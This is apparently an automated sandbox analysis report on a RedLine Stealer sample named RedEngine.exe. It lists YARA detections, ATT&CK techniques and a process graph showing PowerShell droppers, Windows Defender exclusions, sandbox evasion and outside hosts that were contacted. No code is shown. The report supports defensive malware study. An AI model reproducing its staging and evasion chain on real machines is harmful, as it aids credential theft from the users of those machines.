                        Source: Yara matchFile source: 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: mgne4i3n.t1d0.exe PID: 3024, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: mgne4i3n.t1d0.exe PID: 3024, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information22
                        Scripting                        		Valid Accounts1
                        Windows Management Instrumentation                        		22
                        Scripting                        		1
                        DLL Side-Loading                        		211
                        Disable or Modify Tools                        		31
                        Input Capture                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Native API                        		1
                        DLL Side-Loading                        		12
                        Process Injection                        		111
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol31
                        Input Capture                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts212
                        Command and Scripting Interpreter                        		2
                        Scheduled Task/Job                        		2
                        Scheduled Task/Job                        		41
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Scheduled Task/Job                        		1
                        Registry Run Keys / Startup Folder                        		1
                        Registry Run Keys / Startup Folder                        		22
                        Software Packing                        		NTDS46
                        System Information Discovery                        		Distributed Component Object ModelInput Capture3
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell                        		1
                        Bootkit                        		Network Logon Script1
                        DLL Side-Loading                        		LSA Secrets441
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Masquerading                        		Cached Domain Credentials3
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Modify Registry                        		DCSync61
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job61
                        Virtualization/Sandbox Evasion                        		Proc Filesystem11
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                        Process Injection                        		/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Bootkit                        		Network Sniffing1
                        System Network Configuration Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504561 Sample: RedEngine.exe Startdate: 05/09/2024 Architecture: WINDOWS Score: 100 113 bitbucket.org 2->113 115 rentry.org 2->115 117 api.ipify.org 2->117 143 Suricata IDS alerts for network traffic 2->143 145 Antivirus / Scanner detection for submitted sample 2->145 147 Multi AV Scanner detection for submitted file 2->147 149 11 other signatures 2->149 11 RedEngine.exe 2 2->11         started        15 clppth.exe 2->15         started        17 clppth.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 85 C:\Users\user\AppData\...\RedEngine.exe.log, CSV 11->85 dropped 175 Very long command line found 11->175 177 Encrypted powershell cmdline option found 11->177 22 powershell.exe 14 28 11->22         started        87 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 15->87 dropped 89 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 15->89 dropped 91 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 15->91 dropped 99 16 other files (none is malicious) 15->99 dropped 179 Multi AV Scanner detection for dropped file 15->179 181 Found pyInstaller with non standard icon 15->181 27 clppth.exe 15->27         started        93 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 17->93 dropped 95 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 17->95 dropped 97 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 17->97 dropped 101 16 other files (none is malicious) 17->101 dropped 29 clppth.exe 17->29         started        119 127.0.0.1 unknown unknown 19->119 file6 signatures7 process8 dnsIp9 121 bitbucket.org 185.166.143.50 AMAZON-02US Germany 22->121 123 rentry.org 164.132.58.105 OVHFR France 22->123 75 C:\Users\user\AppData\...\mgne4i3n.t1d2.exe, PE32+ 22->75 dropped 77 C:\Users\user\AppData\...\mgne4i3n.t1d1.exe, PE32 22->77 dropped 79 C:\Users\user\AppData\...\mgne4i3n.t1d0.exe, PE32 22->79 dropped 157 Potential dropper URLs found in powershell memory 22->157 159 Loading BitLocker PowerShell Module 22->159 161 Powershell drops PE file 22->161 31 mgne4i3n.t1d1.exe 8 22->31         started        35 mgne4i3n.t1d2.exe 981 22->35         started        37 mgne4i3n.t1d0.exe 4 22->37         started        39 2 other processes 22->39 file10 signatures11 process12 file13 103 C:\Users\user\AppData\Local\Temp\...8E.bat, Non-ISO 31->103 dropped 127 Multi AV Scanner detection for dropped file 31->127 129 Detected unpacking (overwrites its own PE header) 31->129 41 cmd.exe 31->41         started        105 C:\Users\user\AppData\Local\...\zlib1.dll, PE32+ 35->105 dropped 107 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 35->107 dropped 109 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 35->109 dropped 111 16 other files (none is malicious) 35->111 dropped 131 Contains functionality to infect the boot sector 35->131 133 Adds extensions / path to Windows Defender exclusion list 35->133 135 Adds a directory exclusion to Windows Defender 35->135 137 Found pyInstaller with non standard icon 35->137 45 mgne4i3n.t1d2.exe 35->45         started        139 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->139 141 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 37->141 48 conhost.exe 37->48         started        50 conhost.exe 39->50         started        signatures14 process15 dnsIp16 81 C:\Users\user\AppData\Roaming\runHidden.vbs, ASCII 41->81 dropped 163 Suspicious powershell command line found 41->163 165 Command shell drops VBS files 41->165 167 Uses cmd line tools excessively to alter registry or file data 41->167 173 2 other signatures 41->173 52 cmd.exe 41->52         started        55 cmd.exe 41->55         started        57 powershell.exe 41->57         started        61 23 other processes 41->61 125 api.ipify.org 104.26.12.205 CLOUDFLARENETUS United States 45->125 83 C:\Users\user\AppData\Roaming\...\clppth.exe, PE32+ 45->83 dropped 169 Adds extensions / path to Windows Defender exclusion list 45->169 171 Adds a directory exclusion to Windows Defender 45->171 59 cmd.exe 45->59         started        file17 signatures18 process19 signatures20 151 Uses cmd line tools excessively to alter registry or file data 52->151 63 reg.exe 52->63         started        65 reg.exe 55->65         started        153 Potential dropper URLs found in powershell memory 57->153 155 Adds a directory exclusion to Windows Defender 59->155 67 conhost.exe 59->67         started        69 powershell.exe 59->69         started        71 powershell.exe 59->71         started        73 powershell.exe 59->73         started        process21

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.